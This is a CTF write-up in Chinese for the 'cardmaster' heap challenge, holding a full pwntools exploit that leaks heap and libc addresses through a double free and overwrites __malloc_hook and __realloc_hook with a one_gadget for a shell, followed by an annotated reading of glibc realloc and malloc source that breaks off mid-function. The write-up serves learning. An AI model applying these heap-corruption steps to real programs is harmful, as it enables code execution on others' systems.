网鼎杯半决赛
2024-12-20 22:30:24 # wp

cardmaster

赛时wp

超了一小时才做出来。。。思路变换的太不灵活了 对于realloc也不够熟悉
不过说实话这题就是纯靠动调猜出来的
主要的思路就是利用double free来申请到main_chunk(即存储输出函数和存储字符串的堆块地址的chunk) 从而覆盖chunk中的指针 这样就可以泄露出libc地址 堆地址的话就在double free的时候泄露就行了 主要的时间卡在了泄露libc这一步
拿到libc地址后 就是想办法覆盖输出函数指针了 但是试了很久都没找到办法像刚才一样来构造double free 最后试了出来 利用realloc来把0x30的chunk放到tcachebin中 然后调用初始化函数就可以申请出来两个0x30的chunk 然后edit的时候 就可以进入malloc那个分之 就能把0x30的chunk申请出来了 而且这个chunk还是可以自定义地址的 然后就是打malloc_hook了 三个ogg的条件正常都没有办法实现 这里用realloc和malloc相结合的办法可以打通

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
from pwn import*
io = process("./pwn")
#io = remote("83.43.93.13",15000)
elf = ELF("./pwn")
context.arch = "amd64"
context.log_level = "debug"
context.terminal = ['tmux','splitw','-h']
libc = ELF("libc.so.6")

def debug():
gdb.attach(io)
pause()

def init_card():
io.recvuntil(">> ")
io.sendline("1")
def edit_card(count,number,level,payload):
io.recvuntil(">> ")
io.sendline("2")
io.recvuntil("suit count:")
io.sendline(str(count))
io.recvuntil("digit range 1 - ?")
io.sendline(str(number))
io.recvuntil("randomize level:")
io.sendline(str(level))
io.recvuntil("new suite set:")
io.send(payload)
def shuffle_card():
io.recvuntil(">> ")
io.sendline("4")
def show_card():
io.recvuntil(">> ")
io.sendline("5")
def get_info():
io.recvuntil(">> ")
io.sendline("3")

# gdb.attach(io,'b *$rebase(0x1258)')
edit_card(0,1,100,"2\n")
io.recvuntil("suit count:")
io.sendline(str(0))
io.recvuntil("digit range 1 - ?")
io.sendline(str(1))
io.recvuntil("randomize level:")
io.sendline(str(100))
io.recvuntil(">> ")
io.sendline("2")
# gdb.attach(io,'b *$rebase(0x1258)')
io.recvuntil("suit count:")
io.sendline(str(0))
io.recvuntil("digit range 1 - ?")
io.sendline(str(1))
io.recvuntil("randomize level:")
io.sendline(str(100))
# pause()


get_info()
io.recvuntil("suit chara set:")
heap_addr = u64(io.recv(6).ljust(8,b'\x00'))
success("heap_addr :"+hex(heap_addr))
edit_card(300,0,100,"\xa0")
# gdb.attach(io,'b *$rebase(0x137B)')
edit_card(11,0,100,"\xa0")
# pause()
edit_card(11,0,100,p64(heap_addr-0x3c8))
edit_card(1,1,100,"\xa0")
# gdb.attach(io,'b *$rebase(0x11FC)')
edit_card(1,1,100,"a")
# pause()
init_card()
# gdb.attach(io,'b *$rebase(0x11FC)')
edit_card(2,0,100,p64(heap_addr-0x640+0xa30))
# pause()
# gdb.attach(io,'b *$rebase(0xB10)')
get_info()
io.recvuntil("suit chara set:")
libc_addr = u64(io.recv(6).ljust(8,b'\x00'))-0x3ebca0
success("libc_addr :"+hex(libc_addr))
# # pause()

edit_card(8,0,100,"a")
edit_card(12,0,100,"a")
edit_card(1,0,100,"a")
edit_card(8,0,100,"a")
edit_card(1,0,100,"a")

malloc_hook = libc_addr + libc.sym['__malloc_hook']
realloc_hook = libc_addr + libc.sym['__realloc_hook']
onegadget_addr = libc_addr + 0x10a38c
# gdb.attach(io,'b *$rebase(0x137B)')
edit_card(8,0,100,p64(realloc_hook-0x10))
# pause()
# gdb.attach(io,'b *$rebase(0xC1A)')
init_card()
# pause()
# gdb.attach(io,'b *$rebase(0x137B)')
realloc_addr = libc_addr + libc.sym['realloc']
edit_card(8,0,100,p64(0)*2+p64(onegadget_addr)+p64(realloc_addr+0x6))
# pause()

# gdb.attach(io,'b *$rebase(0xC1A)')
init_card()
# pause()
io.interactive()

后记 realloc详解

专门研究了一下realloc 发现还有平时不知道的很多用法
realloc函数主要用于重新分配内存空间 可以调整已分配的内存空间

1
void *realloc(void *ptr, size_t size)

ptr指向需要重分配的chunk指针 size表示的需要分配的大小
来看看正常情况下的realloc如何运作

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
//gcc -o test -g ./test.c
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>

void init(){
setvbuf(stdout, 0, 0, 0);
setvbuf(stdin, 0, 2, 0);
}

int main() {
init();
char *ptr = malloc(0x30);
realloc(ptr,0x10);
}

执行realloc之前的ptr如下图所示
image.png
执行之后 原先的chunk就重新分配成了0x20 剩下的0x20被释放进入bin中
image.png
这里注意的是 虽然重分配的大小是0x10 按理来说0x30的chunk分配掉0x10 那剩余的实际大小应该是0x20 但是最终两个chunk的实际大小都是0x10 是为了考虑到不破坏原有的堆结构
此时如果把realloc函数的ptr参数修改为0 来看看会是什么效果
image.png
由于没有需要重分配的chunk 所以这里直接申请了一个新的chunk
如果把realloc函数的size参数修改为0
image.png
则会直接把chunk释放进入bin中
如果size的大小大于chunk原本的大小呢
image.png
则会直接扩大chunk的size
如果chunk1后面再跟一个chunk2来固定大小呢 这个时候chunk1没法直接向高地址扩大
image.png
可以看到取而代之的办法就是直接释放chunk1 然后重新申请一个满足size的chunk

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
//gcc -o test -g ./test.c
#include <stdio.h>
#include <unistd.h>
#include <errno.h>
#include <stdlib.h>

void init(){
setvbuf(stdout, 0, 0, 0);
setvbuf(stdin, 0, 2, 0);
}

int main() {
init();
char *ptr = malloc(0x30);
char *ptr1 = malloc(0x30);
char *ptr2 = malloc(0x10);
free(ptr1);
realloc(ptr,0x30);
}

这里猜测realloc重分配的逻辑是先释放再申请 这里先释放一个0x30大小的chunk 再进行realloc 看看重新分配后的指针是指向哪一个chunk
image.png
依然指向的是chunk0
image.png
和设想的有点不一样 这里去查看下realloc的注释
image.png
按照源码所说 当重分配的size大于原有的size时 会采用malloc-copy-free的操作序列 也就是先申请满足大小的chunk 再转移数据 最后释放原来的chunk
但是上面我们已经实验过 当tcachebin中存在满足大小的chunk时 他也不会去申请
哪怕把tcachebin换成unsortedbin也是同理
那还是得根据realloc的源代码来查看一下详细的逻辑
(以下源码版本为glibc2.35 中文注释为我所记)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
void *
__libc_realloc (void *oldmem, size_t bytes)
{
mstate ar_ptr;
INTERNAL_SIZE_T nb; /* padded request size */

void *newp; /* chunk to return */

if (!__malloc_initialized) //检测堆是否初始化
ptmalloc_init ();

#if REALLOC_ZERO_BYTES_FREES //这个的值默认为1 当bytes为0且指针不为空时 realloc相当于free函数
if (bytes == 0 && oldmem != NULL)
{
__libc_free (oldmem); return 0;
}
#endif

/* realloc of null is supposed to be same as malloc */
if (oldmem == 0) //当指针为空时 realloc相当于malloc函数
return __libc_malloc (bytes);

/* Perform a quick check to ensure that the pointer's tag matches the
memory's tag. */
if (__glibc_unlikely (mtag_enabled))
*(volatile char*) oldmem;

/* chunk corresponding to oldmem */ //获取内存块指针以及内存块大小
const mchunkptr oldp = mem2chunk (oldmem);
/* its size */
const INTERNAL_SIZE_T oldsize = chunksize (oldp);

if (chunk_is_mmapped (oldp)) //检测是否通过mmap方式分配的内存 malloc函数申请的内存空间是由brk得到的
ar_ptr = NULL;
else
{
MAYBE_INIT_TCACHE ();
ar_ptr = arena_for_chunk (oldp);
}

/* Little security check which won't hurt performance: the allocator
never wrapps around at the end of the address space. Therefore
we can exclude some size values which might appear here by
accident or by "design" from some intruder. */
if ((__builtin_expect ((uintptr_t) oldp > (uintptr_t) -oldsize, 0) //检查内存块大小是否小于零以及指针是否对齐
|| __builtin_expect (misaligned_chunk (oldp), 0)))
malloc_printerr ("realloc(): invalid pointer");

if (!checked_request2size (bytes, &nb)) //检查申请的bytes大小
{
__set_errno (ENOMEM);
return NULL;
}

if (chunk_is_mmapped (oldp))
{
void *newmem;

#if HAVE_MREMAP //默认为0 作用是为1时让realloc使用mremap来重分配大chunk
newp = mremap_chunk (oldp, nb);
if (newp)
{
void *newmem = chunk2mem_tag (newp);
/* Give the new block a different tag. This helps to ensure
that stale handles to the previous mapping are not
reused. There's a performance hit for both us and the
caller for doing this, so we might want to
reconsider. */
return tag_new_usable (newmem);
}
#endif
/* Note the extra SIZE_SZ overhead. */
if (oldsize - SIZE_SZ >= nb) //SIZE_SZ表示chunk的元数据 如果chunk大小大于bytes 就直接返回chunk指针
return oldmem; /* do nothing */

/* Must alloc, copy, free. */
newmem = __libc_malloc (bytes); //这里就是比较关键的逻辑了 如果原有的chunk空间不够重分配 那么就调用malloc(bytes) 然后把旧chunk的内容copy到新chunk
if (newmem == 0)
return 0; /* propagate failure */

memcpy (newmem, oldmem, oldsize - CHUNK_HDR_SZ);
munmap_chunk (oldp); //释放旧chunk
return newmem;
}

if (SINGLE_THREAD_P) //单线程情况下的重分配
{
newp = _int_realloc (ar_ptr, oldp, oldsize, nb);
assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
ar_ptr == arena_for_chunk (mem2chunk (newp)));

return newp;
}

//多线程
__libc_lock_lock (ar_ptr->mutex);

newp = _int_realloc (ar_ptr, oldp, oldsize, nb);

__libc_lock_unlock (ar_ptr->mutex);
assert (!newp || chunk_is_mmapped (mem2chunk (newp)) ||
ar_ptr == arena_for_chunk (mem2chunk (newp)));

//内存分配失败时的异常处理
if (newp == NULL)
{
/* Try harder to allocate memory in other arenas. */
LIBC_PROBE (memory_realloc_retry, 2, bytes, oldmem);
newp = __libc_malloc (bytes);
if (newp != NULL)
{
size_t sz = memsize (oldp);
memcpy (newp, oldmem, sz);
(void) tag_region (chunk2mem (oldp), sz);
_int_free (ar_ptr, oldp, 0);
}
}

return newp;
}

重点关注的部分就是malloc-copy-free这个流程了 当oldp的size不满足bytes的时候 就会触发 但是我们之前的实验却没有成功 不过因为libc_realloc函数中的mcf流程只存在于if (chunk_is_mmapped (oldp))这个分支中 需要chunk由mmap分配的才行 所以接下来需要接着分析int_realloc函数

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
_int_realloc (mstate av, mchunkptr oldp, INTERNAL_SIZE_T oldsize,
INTERNAL_SIZE_T nb)
{
mchunkptr newp; /* chunk to return */
INTERNAL_SIZE_T newsize; /* its size */
void* newmem; /* corresponding user mem */

mchunkptr next; /* next contiguous chunk after oldp */

mchunkptr remainder; /* extra space at end of newp */
unsigned long remainder_size; /* its size */

/* oldmem size */
if (__builtin_expect (chunksize_nomask (oldp) <= CHUNK_HDR_SZ, 0) //检查oldp的大小是否小于等于chunk头大小 如果小于等于 那么oldp明显不正常
|| __builtin_expect (oldsize >= av->system_mem, 0)) //检查oldsize是否大于等于系统内存总量
malloc_printerr ("realloc(): invalid old size");

check_inuse_chunk (av, oldp); //检查oldp指向的内存块是否处于使用中

/* All callers already filter out mmap'ed chunks. */
assert (!chunk_is_mmapped (oldp)); //前面已经处理干净了mmap分配的内存块 这里检查一下

next = chunk_at_offset (oldp, oldsize); //获取下一个内存块
INTERNAL_SIZE_T nextsize = chunksize (next); //获取下一个内存块的大小
if (__builtin_expect (chunksize_nomask (next) <= CHUNK_HDR_SZ, 0) //检查下一个内存块的大小是否小于等于chunk头大小
|| __builtin_expect (nextsize >= av->system_mem, 0)) //检查下一个内存块的大小是否大于等于系统内存总量
malloc_printerr ("realloc(): invalid next size");

if ((unsigned long) (oldsize) >= (unsigned long) (nb)) //检查oldsize是否大于等于nb
{
/* already big enough; split below */
newp = oldp; //如果oldsize大于重分配的size 就不重新申请chunk 而是切割oldp
newsize = oldsize;
}

else
{
/* Try to expand forward into top */
if (next == av->top && //如果下一个chunk是top chunk 就扩展oldp
(unsigned long) (newsize = oldsize + nextsize) >=
(unsigned long) (nb + MINSIZE))
{
set_head_size (oldp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
av->top = chunk_at_offset (oldp, nb);
set_head (av->top, (newsize - nb) | PREV_INUSE);
check_inuse_chunk (av, oldp);
return tag_new_usable (chunk2mem (oldp));
}

/* Try to expand forward into next chunk; split off remainder below */
else if (next != av->top && //如果下一个chunk(free状态)的大小和oldpsize加起来大于等于nb 就合并oldp和nextchunk 然后重分配
!inuse (next) &&
(unsigned long) (newsize = oldsize + nextsize) >=
(unsigned long) (nb))
{
newp = oldp;
unlink_chunk (av, next);
}

/* allocate, copy, free */
else //如果上述的特殊情况都不满足 就按照malloc-copy-free的流程来
{
newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
if (newmem == 0)
return 0; /* propagate failure */

newp = mem2chunk (newmem);
newsize = chunksize (newp);

/*
Avoid copy if newp is next chunk after oldp.
*/
if (newp == next) //这里比较疑惑 用于检测newp是不是next chunk 如果是的话就按照合并oldp和next chunk算 但是正常来说 前面已经处理过这种情况了
{
newsize += oldsize;
newp = oldp;
}
else
{
void *oldmem = chunk2mem (oldp);
size_t sz = memsize (oldp);
(void) tag_region (oldmem, sz); //标记旧内存区域
newmem = tag_new_usable (newmem); //标记新内存区域可用
memcpy (newmem, oldmem, sz);
_int_free (av, oldp, 1);
check_inuse_chunk (av, newp);
return newmem;
}
}
}

/* If possible, free extra space in old or extended chunk */

assert ((unsigned long) (newsize) >= (unsigned long) (nb)); //判断重分配后的chunk大小是否大于需要分配的大小 即检测是否有多余的空间

remainder_size = newsize - nb;

if (remainder_size < MINSIZE) /* not enough extra to split off */
{ //如果剩余的空间小于最小的chunk大小 那么就设置一些chunk的基础信息然后返回
set_head_size (newp, newsize | (av != &main_arena ? NON_MAIN_ARENA : 0));
set_inuse_bit_at_offset (newp, newsize);
}
else /* split remainder */
{ //相反 如果有多余的空间 就切割出来为新的chunk
remainder = chunk_at_offset (newp, nb);
/* Clear any user-space tags before writing the header. */
remainder = tag_region (remainder, remainder_size);
set_head_size (newp, nb | (av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
/* Mark remainder as inuse so free() won't complain */
set_inuse_bit_at_offset (remainder, remainder_size);
_int_free (av, remainder, 1);
}

check_inuse_chunk (av, newp);
return tag_new_usable (chunk2mem (newp));
}

int_realloc的主要逻辑都是通过下面这个if分支来 这里着重来分析一波

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
else  //如果上述的特殊情况都不满足 就按照malloc-copy-free的流程来
{
newmem = _int_malloc (av, nb - MALLOC_ALIGN_MASK);
if (newmem == 0)
return 0; /* propagate failure */

newp = mem2chunk (newmem);
newsize = chunksize (newp);

/*
Avoid copy if newp is next chunk after oldp.
*/
if (newp == next) //这里比较疑惑 用于检测newp是不是next chunk 如果是的话就按照合并oldp和next chunk算 但是正常来说 前面已经处理过这种情况了
{
newsize += oldsize;
newp = oldp;
}
else
{
void *oldmem = chunk2mem (oldp);
size_t sz = memsize (oldp);
(void) tag_region (oldmem, sz); //标记旧内存区域
newmem = tag_new_usable (newmem); //标记新内存区域可用
memcpy (newmem, oldmem, sz);
_int_free (av, oldp, 1);
check_inuse_chunk (av, newp);
return newmem;
}
}

开头先调用int_malloc(注意 这里是int_malloc 正如realloc一样 malloc也有int和libc两种形式 一般我们通过程序调用的是libc_malloc 所以就会出现 之前发现的明明tcachebin中有合适的chunk 但是却不会申请到了 具体是哪里的分支绕走了 又如何解决 还需要接着往下分析)
接下来进行了一个check 检测new_chunk就是next_chunk 但是在此之前 已经单独对next_chunk是否可以用来扩展old_chunk做了判断 这里的if是为了避免int_malloc后 next_chunk变得可用了 而做的异常处理 不过这是为了防止啥样的特殊情况 我也想象不出来 希望在阅读int_malloc后能够得到结论
然后就是标准的copy-free了 由于free在实验过程中没有出现特别显著的问题 所以就先不看int_free的源码了 来看看int_malloc和libc_malloc有什么不同

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
383
384
385
386
387
388
389
390
391
392
393
394
395
396
397
398
399
400
401
402
403
404
405
406
407
408
409
410
411
412
413
414
415
416
417
418
419
420
421
422
423
424
425
426
427
428
429
430
431
432
433
434
435
436
437
438
439
440
441
442
443
444
445
446
447
448
449
450
451
452
453
454
455
456
457
458
459
460
461
462
463
464
465
466
467
468
469
470
471
472
473
474
475
476
477
478
479
480
481
482
483
484
485
486
487
488
489
490
491
492
493
494
495
496
497
498
499
500
501
502
503
504
505
506
507
508
509
510
511
512
513
514
515
516
517
518
519
520
521
522
523
524
525
526
527
528
529
530
531
532
533
534
535
536
537
538
539
540
541
542
543
544
545
546
547
548
549
550
551
552
553
554
555
556
557
558
559
560
561
562
563
564
565
566
567
568
569
570
571
572
573
574
575
576
577
578
579
580
581
582
583
584
585
586
587
588
589
590
591
592
593
594
595
596
597
598
599
600
601
602
603
604
605
606
607
608
609
610
611
612
613
614
615
616
617
618
619
620
621
622
623
624
625
626
627
628
629
630
631
632
633
634
635
636
637
638
639
640
641
642
643
644
645
646
static void *
_int_malloc (mstate av, size_t bytes)
{
INTERNAL_SIZE_T nb; /* normalized request size */
unsigned int idx; /* associated bin index */
mbinptr bin; /* associated bin */

mchunkptr victim; /* inspected/selected chunk */
INTERNAL_SIZE_T size; /* its size */
int victim_index; /* its bin index */

mchunkptr remainder; /* remainder from a split */
unsigned long remainder_size; /* its size */

unsigned int block; /* bit map traverser */
unsigned int bit; /* bit map traverser */
unsigned int map; /* current word of binmap */

mchunkptr fwd; /* misc temp for linking */
mchunkptr bck; /* misc temp for linking */

#if USE_TCACHE
size_t tcache_unsorted_count; /* count of unsorted chunks processed */
#endif

/*
Convert request size to internal form by adding SIZE_SZ bytes
overhead plus possibly more to obtain necessary alignment and/or
to obtain a size of at least MINSIZE, the smallest allocatable
size. Also, checked_request2size returns false for request sizes
that are so large that they wrap around zero when padded and
aligned.
*/

if (!checked_request2size (bytes, &nb)) //将请求的内存大小bytes加上chunk的头部大小
{
__set_errno (ENOMEM);
return NULL;
}

/* There are no usable arenas. Fall back to sysmalloc to get a chunk from
mmap. */
if (__glibc_unlikely (av == NULL)) //如果没有可用的内存分配区 调用sysmalloc通过mmap分配
{
void *p = sysmalloc (nb, av);
if (p != NULL)
alloc_perturb (p, bytes);
return p;
}

/*
If the size qualifies as a fastbin, first check corresponding bin.
This code is safe to execute even if av is not yet initialized, so we
can try it without checking, which saves some time on this fast path.
*/

#define REMOVE_FB(fb, victim, pp) \
do \
{ \ //从fastbin中取出chunk
victim = pp; \
if (victim == NULL) \
break; \
pp = REVEAL_PTR (victim->fd); \
if (__glibc_unlikely (pp != NULL && misaligned_chunk (pp))) \ //安全性检查 判断指针是否为空 是否对齐
malloc_printerr ("malloc(): unaligned fastbin chunk detected"); \
} \
while ((pp = catomic_compare_and_exchange_val_acq (fb, pp, victim)) \
!= victim); \

if ((unsigned long) (nb) <= (unsigned long) (get_max_fast ())) //判断请求的大小是否处于fastbin的范围内
{
idx = fastbin_index (nb);
mfastbinptr *fb = &fastbin (av, idx); //获取fastbin链表头
mchunkptr pp;
victim = *fb;

if (victim != NULL)
{
if (__glibc_unlikely (misaligned_chunk (victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 2");

if (SINGLE_THREAD_P)
*fb = REVEAL_PTR (victim->fd);
else
REMOVE_FB (fb, pp, victim); //多线程时从fastbin中取出chunk
if (__glibc_likely (victim != NULL)) //安全性检查
{
size_t victim_idx = fastbin_index (chunksize (victim));
if (__builtin_expect (victim_idx != idx, 0))
malloc_printerr ("malloc(): memory corruption (fast)");
check_remalloced_chunk (av, victim, nb);
#if USE_TCACHE //这一部分就是以前学过的tcache stash机制 在fastbin中申请chunk后 如果链表中还有free chunk 就会把这些chunk放到tcachebin中
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks. */
while (tcache->counts[tc_idx] < mp_.tcache_count //如果tcache对应size的链表还有空余 就转移chunk
&& (tc_victim = *fb) != NULL)
{
if (__glibc_unlikely (misaligned_chunk (tc_victim)))
malloc_printerr ("malloc(): unaligned fastbin chunk detected 3");
if (SINGLE_THREAD_P)
*fb = REVEAL_PTR (tc_victim->fd);
else
{
REMOVE_FB (fb, pp, tc_victim);
if (__glibc_unlikely (tc_victim == NULL))
break;
}
tcache_put (tc_victim, tc_idx);
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}
}

/*
If a small request, check regular bin. Since these "smallbins"
hold one size each, no searching within bins is necessary.
(For a large request, we need to wait until unsorted chunks are
processed to find best fit. But for small ones, fits are exact
anyway, so we can check now, which is faster.)
*/
//先在smallbin中查询可用chunk 因为smallbin链表类似tcachebin 每个size都有一个链表 查询起来速度快
if (in_smallbin_range (nb))
{
idx = smallbin_index (nb);
bin = bin_at (av, idx); //获取smallbin的链表头

if ((victim = last (bin)) != bin)
{
bck = victim->bk; //取链表的最后一个chunk的上一个chunk
if (__glibc_unlikely (bck->fd != victim)) //安全性检查 如果bck的下一个chunk不是victim 说明链表被破坏
malloc_printerr ("malloc(): smallbin double linked list corrupted");
set_inuse_bit_at_offset (victim, nb);
bin->bk = bck; //将链表中的最后一个chunk拿去使用 随后恢复链表结构
bck->fd = bin;

if (av != &main_arena) //如果分配区不是main_arena 设置chunk的arena为非main_arena
set_non_main_arena (victim);
check_malloced_chunk (av, victim, nb);
#if USE_TCACHE
//和fastbin中一样 如果smallbin中链表还有其他free chunk 且符合tcachebin的范围 同时tcachebin中有空闲位置 就全部放到tcachebin中
/* While we're here, if we see other chunks of the same size,
stash them in the tcache. */
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins)
{
mchunkptr tc_victim;

/* While bin not empty and tcache not full, copy chunks over. */
while (tcache->counts[tc_idx] < mp_.tcache_count
&& (tc_victim = last (bin)) != bin)
{
if (tc_victim != 0)
{
bck = tc_victim->bk;
set_inuse_bit_at_offset (tc_victim, nb);
if (av != &main_arena)
set_non_main_arena (tc_victim);
bin->bk = bck;
bck->fd = bin;

tcache_put (tc_victim, tc_idx);
}
}
}
#endif
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}
}

/*
If this is a large request, consolidate fastbins before continuing.
While it might look excessive to kill all fastbins before
even seeing if there is space available, this avoids
fragmentation problems normally associated with fastbins.
Also, in practice, programs tend to have runs of either small or
large requests, but less often mixtures, so consolidation is not
invoked all that often in most programs. And the programs that
it is called frequently in otherwise tend to fragment.
*/

else
{ //如果是从largebin中分配 就会触发malloc_consolidate来合并chunk 这个以前也有学过
idx = largebin_index (nb);
if (atomic_load_relaxed (&av->have_fastchunks))
malloc_consolidate (av);
}

/*
Process recently freed or remaindered chunks, taking one only if
it is exact fit, or, if this a small request, the chunk is remainder from
the most recent non-exact fit. Place other traversed chunks in
bins. Note that this step is the only place in any routine where
chunks are placed in bins.

The outer loop here is needed because we might not realize until
near the end of malloc that we should have consolidated, so must
do so and retry. This happens at most once, and only when we would
otherwise need to expand memory to service a "small" request.
*/

#if USE_TCACHE
INTERNAL_SIZE_T tcache_nb = 0;
size_t tc_idx = csize2tidx (nb);
if (tcache && tc_idx < mp_.tcache_bins) //判断请求大小是否属于tcachebin的范围
tcache_nb = nb;
int return_cached = 0;

tcache_unsorted_count = 0;
#endif

for (;; )
{
int iters = 0;
//判断链表头的上一个chunk是否为链表头本身 如果是 那么链表中无空闲chunk 不进入while循环
while ((victim = unsorted_chunks (av)->bk) != unsorted_chunks (av))
{
bck = victim->bk; //获取链表中的最后一个chunk
size = chunksize (victim);
mchunkptr next = chunk_at_offset (victim, size); //获取victim下一个相邻chunk的地址
if (__glibc_unlikely (size <= CHUNK_HDR_SZ) //安全性检查
|| __glibc_unlikely (size > av->system_mem))
malloc_printerr ("malloc(): invalid size (unsorted)");
if (__glibc_unlikely (chunksize_nomask (next) < CHUNK_HDR_SZ) //检查下一个chunk的size是否符合要求
|| __glibc_unlikely (chunksize_nomask (next) > av->system_mem))
malloc_printerr ("malloc(): invalid next size (unsorted)");
if (__glibc_unlikely ((prev_size (next) & ~(SIZE_BITS)) != size)) //检查next_chunk的prev_size是否正确
malloc_printerr ("malloc(): mismatching next->prev_size (unsorted)");
if (__glibc_unlikely (bck->fd != victim) //检查链表结构
|| __glibc_unlikely (victim->fd != unsorted_chunks (av)))
malloc_printerr ("malloc(): unsorted double linked list corrupted");
if (__glibc_unlikely (prev_inuse (next))) //检查next_chunk的prev_inuse位是否为0
malloc_printerr ("malloc(): invalid next->prev_inuse (unsorted)");

/*
If a small request, try to use last remainder if it is the
only chunk in unsorted bin. This helps promote locality for
runs of consecutive small requests. This is the only
exception to best-fit, and applies only when there is
no exact fit for a small chunk.
*/

if (in_smallbin_range (nb) && //如果请求大小属于small chunk 同时victim的size大于申请的size
bck == unsorted_chunks (av) && //这一点要注意 check的是bck和main_arena中对应链表的指针 如果是通过填满tcache来把chunk释放进入unsortedbin的方式 还需要先随便申请一个小chunk才能触发这个if分支 具体原因就是第一次申请chunk的时候 unsorted_chunks(av)的值为0
victim == av->last_remainder &&
(unsigned long) (size) > (unsigned long) (nb + MINSIZE))
{
/* split and reattach remainder */
remainder_size = size - nb; //从剩余的空间中分割chunk
remainder = chunk_at_offset (victim, nb);
unsorted_chunks (av)->bk = unsorted_chunks (av)->fd = remainder;
av->last_remainder = remainder;
remainder->bk = remainder->fd = unsorted_chunks (av);
if (!in_smallbin_range (remainder_size))
{
remainder->fd_nextsize = NULL;
remainder->bk_nextsize = NULL;
}

set_head (victim, nb | PREV_INUSE |
(av != &main_arena ? NON_MAIN_ARENA : 0));
set_head (remainder, remainder_size | PREV_INUSE);
set_foot (remainder, remainder_size);

check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
}

/* remove from unsorted list */
if (__glibc_unlikely (bck->fd != victim)) //安全性检查
malloc_printerr ("malloc(): corrupted unsorted chunks 3");
unsorted_chunks (av)->bk = bck;
bck->fd = unsorted_chunks (av);

/* Take now instead of binning if exact fit */

if (size == nb) //如果申请的chunk大小和剩余的大小一致 就走这个分支
{
set_inuse_bit_at_offset (victim, size);
if (av != &main_arena)
set_non_main_arena (victim);
#if USE_TCACHE
/* Fill cache first, return to user only if cache fills.
We may return one of these chunks later. */
if (tcache_nb //如果有tcachebin 就先把这个chunk放到tcachebin中
&& tcache->counts[tc_idx] < mp_.tcache_count)
{
tcache_put (victim, tc_idx);
return_cached = 1;
continue;
}
else
{
#endif
check_malloced_chunk (av, victim, nb);
void *p = chunk2mem (victim);
alloc_perturb (p, bytes);
return p;
#if USE_TCACHE
}
#endif
}

/* place chunk in bin */

if (in_smallbin_range (size)) //这里根据chunk的大小来判断要放入smallbin还是largebin
{
victim_index = smallbin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;
}
else
{
victim_index = largebin_index (size);
bck = bin_at (av, victim_index);
fwd = bck->fd;

/* maintain large bins in sorted order */ //这一段是largebin按照大小排序的部分
if (fwd != bck)
{
/* Or with inuse bit to speed comparisons */
size |= PREV_INUSE;
/* if smaller than smallest, bypass loop below */
assert (chunk_main_arena (bck->bk));
if ((unsigned long) (size)
< (unsigned long) chunksize_nomask (bck->bk))
{
